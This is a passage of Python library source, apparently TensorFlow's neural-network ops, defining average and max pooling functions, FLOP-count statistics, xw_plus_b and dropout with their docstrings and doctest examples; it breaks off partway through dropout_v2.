@tf_export(v1=["nn.avg_pool", "nn.avg_pool2d"])
@dispatch.add_dispatch_support
def avg_pool(value, ksize, strides, padding, data_format="NHWC",
name=None, input=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Args:
value: A 4-D `Tensor` of shape `[batch, height, width, channels]` and type
`float32`, `float64`, `qint8`, `quint8`, or `qint32`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NHWC' and 'NCHW' are supported.
name: Optional name for the operation.
input: Alias for value.
Returns:
A `Tensor` with the same type as `value`. The average pooled output tensor.
"""
with ops.name_scope(name, "AvgPool", [value]) as name:
value = deprecation.deprecated_argument_lookup(
"input", input, "value", value)
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
return gen_nn_ops.avg_pool(
value,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
@tf_export("nn.avg_pool2d", v1=[])
@dispatch.add_dispatch_support
def avg_pool2d(input, ksize, strides, padding, data_format="NHWC", name=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Args:
input: A 4-D `Tensor` of shape `[batch, height, width, channels]` and type
`float32`, `float64`, `qint8`, `quint8`, or `qint32`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NHWC' and 'NCHW' are supported.
name: Optional name for the operation.
Returns:
A `Tensor` with the same type as `value`. The average pooled output tensor.
"""
with ops.name_scope(name, "AvgPool2D", [input]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
return gen_nn_ops.avg_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
@tf_export("nn.avg_pool1d")
@dispatch.add_dispatch_support
def avg_pool1d(input, ksize, strides, padding, data_format="NWC", name=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Note internally this op reshapes and uses the underlying 2d operation.
Args:
input: A 3-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1` or `3`. The size of the
window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1` or `3`. The stride of
the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: An optional string from: "NWC", "NCW". Defaults to "NWC".
name: A name for the operation (optional).
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
with ops.name_scope(name, "AvgPool1D", [input]) as name:
if data_format is None:
data_format = "NWC"
channel_index = 1 if data_format.startswith("NC") else 2
ksize = [1] + _get_sequence(ksize, 1, channel_index, "ksize")
strides = [1] + _get_sequence(strides, 1, channel_index, "strides")
expanding_dim = 1 if data_format == "NWC" else 2
data_format = "NHWC" if data_format == "NWC" else "NCHW"
input = array_ops.expand_dims_v2(input, expanding_dim)
result = gen_nn_ops.avg_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
return array_ops.squeeze(result, expanding_dim)
@tf_export("nn.avg_pool3d")
@dispatch.add_dispatch_support
def avg_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Args:
input: A 5-D `Tensor` of shape `[batch, height, width, channels]` and type
`float32`, `float64`, `qint8`, `quint8`, or `qint32`.
ksize: An int or list of `ints` that has length `1`, `3` or `5`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `3` or `5`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NDHWC' and 'NCDHW' are supported.
name: Optional name for the operation.
Returns:
A `Tensor` with the same type as `value`. The average pooled output tensor.
"""
with ops.name_scope(name, "AvgPool3D", [input]) as name:
if data_format is None:
data_format = "NDHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 3, channel_index, "ksize")
strides = _get_sequence(strides, 3, channel_index, "strides")
return gen_nn_ops.avg_pool3d(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool", v1=["nn.max_pool_v2"])
@dispatch.add_dispatch_support
def max_pool_v2(input, ksize, strides, padding, data_format=None, name=None):
"""Performs max pooling on the input.
For a given window of `ksize`, takes the maximum value within that window.
Used for reducing computation and preventing overfitting.
Consider an example of pooling with 2x2, non-overlapping windows:
>>> matrix = tf.constant([
... [0, 0, 1, 7],
... [0, 2, 0, 0],
... [5, 2, 0, 0],
... [0, 0, 9, 8],
... ])
>>> reshaped = tf.reshape(matrix, (1, 4, 4, 1))
>>> tf.nn.max_pool(reshaped, ksize=2, strides=2, padding="SAME")
<tf.Tensor: shape=(1, 2, 2, 1), dtype=int32, numpy=
array([[[[2],
[7]],
[[5],
[9]]]], dtype=int32)>
We can adjust the window size using the `ksize` parameter. For example, if we
were to expand the window to 3:
>>> tf.nn.max_pool(reshaped, ksize=3, strides=2, padding="SAME")
<tf.Tensor: shape=(1, 2, 2, 1), dtype=int32, numpy=
array([[[[5],
[7]],
[[9],
[9]]]], dtype=int32)>
We've now picked up two additional large numbers (5 and 9) in two of the
pooled spots.
Note that our windows are now overlapping, since we're still moving by 2 units
on each iteration. This is causing us to see the same 9 repeated twice, since
it is part of two overlapping windows.
We can adjust how far we move our window with each iteration using the
`strides` parameter. Updating this to the same value as our window size
eliminates the overlap:
>>> tf.nn.max_pool(reshaped, ksize=3, strides=3, padding="SAME")
<tf.Tensor: shape=(1, 2, 2, 1), dtype=int32, numpy=
array([[[[2],
[7]],
[[5],
[9]]]], dtype=int32)>
Because the window does not neatly fit into our input, padding is added around
the edges, giving us the same result as when we used a 2x2 window. We can skip
padding altogether and simply drop the windows that do not fully fit into our
input by instead passing `"VALID"` to the `padding` argument:
>>> tf.nn.max_pool(reshaped, ksize=3, strides=3, padding="VALID")
<tf.Tensor: shape=(1, 1, 1, 1), dtype=int32, numpy=array([[[[5]]]],
dtype=int32)>
Now we've grabbed the largest value in the 3x3 window starting from the upper-
left corner. Since no other windows fit in our input, they are dropped.
Args:
input: Tensor of rank N+2, of shape `[batch_size] + input_spatial_shape +
[num_channels]` if `data_format` does not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
ksize: An int or list of `ints` that has length `1`, `N` or `N+2`. The size
of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `N` or `N+2`. The
stride of the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`. When using explicit
padding, the size of the paddings cannot be greater than the sliding
window size.
data_format: A string. Specifies the channel dimension. For N=1 it can be
either "NWC" (default) or "NCW", for N=2 it can be either "NHWC" (default)
or "NCHW" and for N=3 either "NDHWC" (default) or "NCDHW".
name: Optional name for the operation.
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
if input.shape is not None:
n = len(input.shape) - 2
elif data_format is not None:
n = len(data_format) - 2
else:
raise ValueError(
"The input must have a rank or a data format must be given.")
if not 1 <= n <= 3:
raise ValueError(
"Input tensor must be of rank 3, 4 or 5 but was {}.".format(n + 2))
if data_format is None:
channel_index = n + 1
else:
channel_index = 1 if data_format.startswith("NC") else n + 1
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
ksize = _get_sequence(ksize, n, channel_index, "ksize")
strides = _get_sequence(strides, n, channel_index, "strides")
if (isinstance(padding, (list, tuple)) and n == 3):
raise ValueError("Explicit padding is not yet supported with an input "
"tensor of rank 5")
max_pooling_ops = {
1: max_pool1d,
2: max_pool2d,
3: gen_nn_ops.max_pool3d
}
op = max_pooling_ops[n]
return op(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
@tf_export(v1=["nn.max_pool"])
@dispatch.add_dispatch_support
def max_pool(value,
ksize,
strides,
padding,
data_format="NHWC",
name=None,
input=None): # pylint: disable=redefined-builtin
"""Performs the max pooling on the input.
Args:
value: A 4-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`.
The size of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`.
The stride of the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`. When using explicit
padding, the size of the paddings cannot be greater than the sliding
window size.
data_format: A string. 'NHWC', 'NCHW' and 'NCHW_VECT_C' are supported.
name: Optional name for the operation.
input: Alias for value.
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
value = deprecation.deprecated_argument_lookup("input", input, "value", value)
with ops.name_scope(name, "MaxPool", [value]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
padding, explicit_paddings = convert_padding(padding)
if ((np.isscalar(ksize) and ksize == 0) or
(isinstance(ksize,
(list, tuple, np.ndarray)) and any(v == 0 for v in ksize))):
raise ValueError("ksize cannot be zero.")
return gen_nn_ops.max_pool(
value,
ksize=ksize,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
name=name)
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool1d")
@dispatch.add_dispatch_support
def max_pool1d(input, ksize, strides, padding, data_format="NWC", name=None):
"""Performs the max pooling on the input.
Note internally this op reshapes and uses the underlying 2d operation.
Args:
input: A 3-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1` or `3`. The size of the
window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1` or `3`. The stride of
the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NWC"`, this should be in the form `[[0, 0], [pad_left,
pad_right], [0, 0]]`. When explicit padding used and data_format is
`"NCW"`, this should be in the form `[[0, 0], [0, 0], [pad_left,
pad_right]]`. When using explicit padding, the size of the paddings cannot
be greater than the sliding window size.
data_format: An optional string from: "NWC", "NCW". Defaults to "NWC".
name: A name for the operation (optional).
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
with ops.name_scope(name, "MaxPool1d", [input]) as name:
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
if data_format is None:
data_format = "NWC"
channel_index = 1 if data_format.startswith("NC") else 2
ksize = [1] + _get_sequence(ksize, 1, channel_index, "ksize")
strides = [1] + _get_sequence(strides, 1, channel_index, "strides")
padding, explicit_paddings = convert_padding(padding, 3)
if padding == "EXPLICIT":
explicit_paddings = [0, 0] + explicit_paddings
expanding_dim = 1 if data_format == "NWC" else 2
data_format = "NHWC" if data_format == "NWC" else "NCHW"
input = array_ops.expand_dims_v2(input, expanding_dim)
result = gen_nn_ops.max_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
name=name)
return array_ops.squeeze(result, expanding_dim)
# pylint: enable=redefined-builtin
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool2d")
@dispatch.add_dispatch_support
def max_pool2d(input, ksize, strides, padding, data_format="NHWC", name=None):
"""Performs the max pooling on the input.
Args:
input: A 4-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`. When using explicit
padding, the size of the paddings cannot be greater than the sliding
window size.
data_format: A string. 'NHWC', 'NCHW' and 'NCHW_VECT_C' are supported.
name: Optional name for the operation.
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
with ops.name_scope(name, "MaxPool2d", [input]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.max_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool3d")
@dispatch.add_dispatch_support
def max_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None):
"""Performs the max pooling on the input.
Args:
input: A 5-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1`, `3` or `5`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `3` or `5`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: An optional string from: "NDHWC", "NCDHW". Defaults to "NDHWC".
The data format of the input and output data. With the default format
"NDHWC", the data is stored in the order of: [batch, in_depth, in_height,
in_width, in_channels]. Alternatively, the format could be "NCDHW", the
data storage order is: [batch, in_channels, in_depth, in_height,
in_width].
name: A name for the operation (optional).
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
with ops.name_scope(name, "MaxPool3D", [input]) as name:
if data_format is None:
data_format = "NDHWC"
channel_index = 1 if data_format.startswith("NC") else 4
ksize = _get_sequence(ksize, 3, channel_index, "ksize")
strides = _get_sequence(strides, 3, channel_index, "strides")
return gen_nn_ops.max_pool3d(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
@tf_export("nn.max_pool_with_argmax", v1=[])
@dispatch.add_dispatch_support
def max_pool_with_argmax_v2(
input, # pylint: disable=redefined-builtin
ksize,
strides,
padding,
data_format="NHWC",
output_dtype=dtypes.int64,
include_batch_in_index=False,
name=None):
"""Performs max pooling on the input and outputs both max values and indices.
The indices in `argmax` are flattened, so that a maximum value at position
`[b, y, x, c]` becomes flattened index: `(y * width + x) * channels + c` if
`include_batch_in_index` is False;
`((b * height + y) * width + x) * channels + c`
if `include_batch_in_index` is True.
The indices returned are always in `[0, height) x [0, width)` before
flattening, even if padding is involved and the mathematically correct answer
is outside (either negative or too large). This is a bug, but fixing it is
difficult to do in a safe backwards compatible way, especially due to
flattening.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`,
`uint32`, `uint64`.
4-D with shape `[batch, height, width, channels]`. Input to pool over.
ksize: An int or list of `ints` that has length `1`, `2` or `4`.
The size of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string`, must be set to `"NHWC"`. Defaults to
`"NHWC"`.
Specify the data format of the input and output data.
output_dtype: An optional `tf.DType` from: `tf.int32, tf.int64`.
Defaults to `tf.int64`.
The dtype of the returned argmax tensor.
include_batch_in_index: An optional `boolean`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, argmax).
output: A `Tensor`. Has the same type as `input`.
argmax: A `Tensor` of type `output_dtype`.
"""
if data_format != "NHWC":
raise ValueError("Data formats other than 'NHWC' are not yet supported")
ksize = _get_sequence(ksize, 2, 3, "ksize")
strides = _get_sequence(strides, 2, 3, "strides")
return gen_nn_ops.max_pool_with_argmax(
input=input,
ksize=ksize,
strides=strides,
padding=padding,
Targmax=output_dtype,
include_batch_in_index=include_batch_in_index,
name=name)
@tf_export(v1=["nn.max_pool_with_argmax"])
@dispatch.add_dispatch_support
def max_pool_with_argmax_v1( # pylint: disable=missing-docstring,invalid-name
input, # pylint: disable=redefined-builtin
ksize,
strides,
padding,
data_format="NHWC",
Targmax=None,
name=None,
output_dtype=None,
include_batch_in_index=False):
if data_format != "NHWC":
raise ValueError("Data formats other than 'NHWC' are not yet supported")
Targmax = deprecated_argument_lookup(
"output_dtype", output_dtype, "Targmax", Targmax)
if Targmax is None:
Targmax = dtypes.int64
return gen_nn_ops.max_pool_with_argmax(
input=input,
ksize=ksize,
strides=strides,
padding=padding,
Targmax=Targmax,
include_batch_in_index=include_batch_in_index,
name=name)
max_pool_with_argmax_v1.__doc__ = gen_nn_ops.max_pool_with_argmax.__doc__
@ops.RegisterStatistics("Conv3D", "flops")
def _calc_conv3d_flops(graph, node):
"""Calculates the compute resources needed for Conv3D."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_time = int(filter_shape[0])
filter_height = int(filter_shape[1])
filter_width = int(filter_shape[2])
filter_in_depth = int(filter_shape[3])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats("flops", (output_count * filter_in_depth * filter_time *
filter_height * filter_width * 2))
@ops.RegisterStatistics("Conv2D", "flops")
def _calc_conv_flops(graph, node):
"""Calculates the compute resources needed for Conv2D."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_height = int(filter_shape[0])
filter_width = int(filter_shape[1])
filter_in_depth = int(filter_shape[2])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats(
"flops",
(output_count * filter_in_depth * filter_height * filter_width * 2))
@ops.RegisterStatistics("DepthwiseConv2dNative", "flops")
def _calc_depthwise_conv_flops(graph, node):
"""Calculates the compute resources needed for DepthwiseConv2dNative."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_height = int(filter_shape[0])
filter_width = int(filter_shape[1])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats("flops", (output_count * filter_height * filter_width * 2))
@ops.RegisterStatistics("BiasAdd", "flops")
def _calc_bias_add_flops(graph, node):
"""Calculates the computing needed for BiasAdd."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
input_count = np.prod(input_shape.as_list())
return ops.OpStats("flops", input_count)
@tf_export(v1=["nn.xw_plus_b"])
@dispatch.add_dispatch_support
def xw_plus_b(x, weights, biases, name=None): # pylint: disable=invalid-name
"""Computes matmul(x, weights) + biases.
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"xw_plus_b" is used.
Returns:
A 2-D Tensor computing matmul(x, weights) + biases.
Dimensions typically: batch, out_units.
"""
with ops.name_scope(name, "xw_plus_b", [x, weights, biases]) as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
mm = math_ops.matmul(x, weights)
return bias_add(mm, biases, name=name)
def xw_plus_b_v1(x, weights, biases, name=None):
"""Computes matmul(x, weights) + biases.
This is a deprecated version of that will soon be removed.
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"xw_plus_b_v1" is used.
Returns:
A 2-D Tensor computing matmul(x, weights) + biases.
Dimensions typically: batch, out_units.
"""
with ops.name_scope(name, "xw_plus_b_v1", [x, weights, biases]) as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
mm = math_ops.matmul(x, weights)
return bias_add_v1(mm, biases, name=name)
def _get_noise_shape(x, noise_shape):
# If noise_shape is none return immediately.
if noise_shape is None:
return array_ops.shape(x)
try:
# Best effort to figure out the intended shape.
# If not possible, let the op to handle it.
# In eager mode exception will show up.
noise_shape_ = tensor_shape.as_shape(noise_shape)
except (TypeError, ValueError):
return noise_shape
if x.shape.dims is not None and len(x.shape.dims) == len(noise_shape_.dims):
new_dims = []
for i, dim in enumerate(x.shape.dims):
if noise_shape_.dims[i].value is None and dim.value is not None:
new_dims.append(dim.value)
else:
new_dims.append(noise_shape_.dims[i].value)
return tensor_shape.TensorShape(new_dims)
return noise_shape
@tf_export(v1=["nn.dropout"])
@dispatch.add_dispatch_support
@deprecation.deprecated_args(None, "Please use `rate` instead of `keep_prob`. "
"Rate should be set to `rate = 1 - keep_prob`.",
"keep_prob")
def dropout(x, keep_prob=None, noise_shape=None, seed=None, name=None,
rate=None):
"""Computes dropout.
For each element of `x`, with probability `rate`, outputs `0`, and otherwise
scales up the input by `1 / (1-rate)`. The scaling is such that the expected
sum is unchanged.
By default, each element is kept or dropped independently. If `noise_shape`
is specified, it must be
[broadcastable](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
to the shape of `x`, and only dimensions with `noise_shape[i] == shape(x)[i]`
will make independent decisions. For example, if `shape(x) = [k, l, m, n]`
and `noise_shape = [k, 1, 1, n]`, each batch and channel component will be
kept independently and each row and column will be kept or not kept together.
Args:
x: A floating point tensor.
keep_prob: (deprecated) A deprecated alias for `(1-rate)`.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
seed: A Python integer. Used to create random seeds. See
`tf.random.set_seed` for behavior.
name: A name for this operation (optional).
rate: A scalar `Tensor` with the same type as `x`. The probability that each
element of `x` is discarded.
Returns:
A Tensor of the same shape of `x`.
Raises:
ValueError: If `rate` is not in `[0, 1)` or if `x` is not a floating
point tensor.
"""
try:
keep = 1. - keep_prob if keep_prob is not None else None
except TypeError:
raise ValueError("keep_prob must be a floating point number or Tensor "
"(got %r)" % keep_prob)
rate = deprecation.deprecated_argument_lookup(
"rate", rate,
"keep_prob", keep)
if rate is None:
raise ValueError("You must provide a rate to dropout.")
return dropout_v2(x, rate, noise_shape=noise_shape, seed=seed, name=name)
@tf_export("nn.dropout", v1=[])
@dispatch.add_dispatch_support
def dropout_v2(x, rate, noise_shape=None, seed=None, name=None):
"""Computes dropout: randomly sets elements to zero to prevent overfitting.
Note: The behavior of dropout has changed between TensorFlow 1.x and 2.x.
When converting 1.x code, please use named arguments to ensure behavior stays
consistent.
See also: `tf.keras.layers.Dropout` for a dropout layer.
[Dropout](https://arxiv.org/abs/1207.0580) is useful for regularizing DNN
models. Inputs elements are randomly set to zero (and the other elements are
rescaled). This encourages each node to be independently useful, as it cannot
rely on the output of other nodes.
More precisely: With probability `rate` elements of `x` are set to `0`.
The remaining elements are scaled up by `1.0 / (1 - rate)`, so that the
expected value is preserved.
>>> tf.random.set_seed(0)
>>> x = tf.ones([3,5])
>>> tf.nn.dropout(x, rate = 0.5, seed = 1).numpy()
array([[2., 0., 0., 2., 2.],
[2., 2., 2., 2., 2.],
[2., 0., 2., 0., 2.]], dtype=float32)
>>> tf.random.set_seed(0)
>>> x = tf.ones([3,5])
>>> tf.nn.dropout(x, rate = 0.8, seed = 1).numpy()
array([[0., 0., 0., 5., 5.],
[0., 5., 0., 5., 0.],
[5., 0., 5., 0., 5.]], dtype=float32)
>>> tf.nn.dropout(x, rate = 0.0) == x
<tf.Tensor: shape=(3, 5), dtype=bool, numpy=
array([[ True, True, True, True, True],
[ True, True, True, True, True],
[ True, True, True, True, True]])>
By default, each element is kept or dropped independently. If `noise_shape`
is specified, it must be
[broadcastable](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
to the shape of `x`, and only dimensions with `noise_shape[i] == shape(x)[i]`
will make independent decisions. This is useful for dropping whole
channels from an image or sequence. For example:
>>> tf.random.set_seed(0)
>>> x = tf.ones([3,10])
>>> tf.nn.dropout(x, rate = 2/3, noise_shape=[1,10], seed=1).numpy()
array([[0., 0., 0., 3., 3., 0., 3., 3., 3., 0.],
[0., 0., 0., 3., 3., 0., 3., 3., 3., 0.],
[0., 0., 0., 3., 3., 0., 3., 3., 3., 0.]], dtype=float32)
Args:
x: A floating point tensor.
rate: A scalar `Tensor` with the same type as x. The probability
that each element is dropped. For example, setting rate=0.1 would drop
10% of input elements.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
seed: A Python integer. Used to create random seeds. See
`tf.random.set_seed` for behavior.
name: A name for this operation (optional).
Returns:
A Tensor of the same shape of `x`.
Raises:
ValueError: If `rate` is not in `[0, 1)` or if `x` is not a floating point
tensor. `rate=1` is disallowed, because the output would be all zeros,
which is likely not what was intended.
"""
with ops.name_scope(name, "dropout", [x]) as name:
is_rate_number = isinstance(rate, numbers.Real)
if is_rate_number and (rate < 0 or rate >= 1):
raise ValueError("rate must be a scalar tensor or a float in the "
"range [0, 1), got %g" % rate)
x = ops.convert_to_tensor(x, name="x")
x_dtype = x.dtype
if not x_dtype.is_floating:
raise ValueError("x has to be a floating point tensor since it's going "
"to be scaled. Got a %s tensor instead." % x_dtype)
if is_rate_number and rate == 0:
# Fast-path: Return the input immediately if rate is non-tensor & is `0`.
# We trigger this after all error checking
# and after `x` has been converted to a tensor, to prevent inconsistent
# tensor conversions/error raising if rate is changed to/from 0.
#
# We also explicitly call `random_seed.get_seed` to make sure
# we don't change the random number generation behavior of
# stateful random ops by entering a fastpath,
# despite not generating a random tensor in the fastpath
random_seed.get_seed(seed)
return x
is_executing_eagerly = context.executing_eagerly()
if not tensor_util.is_tf_type(rate):
if is_rate_number:
keep_prob = 1 - rate
scale = 1 / keep_prob
scale = ops.convert_to_tensor(scale, dtype=x_dtype)
ret = gen_math_ops.mul(x, scale)
else:
raise ValueError("rate is neither scalar nor scalar tensor %r" % rate)
else:
rate.get_shape().assert_has_rank(0)
rate_dtype = rate.dtype
if rate_dtype != x_dtype:
if not rate_dtype.is_compatible_with(x_dtype):
raise ValueError(
"Tensor dtype %s is incomptaible with Tensor dtype %s: %r" %
(x_dtype.name, rate_dtype.name, rate))
rate = gen_math_ops.cast(rate, x_dtype, name="rate")
one_tensor = constant_op.constant(1, dtype=x_dtype)
ret = gen_math_ops.real_div(x, gen_math_ops.sub(one_tensor, rate))
noise_shape = _get_noise_shape(x, noise_shape)
# Sample a uniform distribution on [0.0, 1.0) and select values larger
# than rate.
#
# NOTE: Random uniform can only generate 2^23 floats on [1.0, 2.0)
# and subtract 1.0.
random_tensor = random_ops.random_uniform(
noise_shape, seed=seed, dtype=x_dtype)
# NOTE: if (1.0 + rate) - 1 is equal to rate, then that float is selected,
# hence a >= comparison is used.
keep_mask = random_tensor >= rate
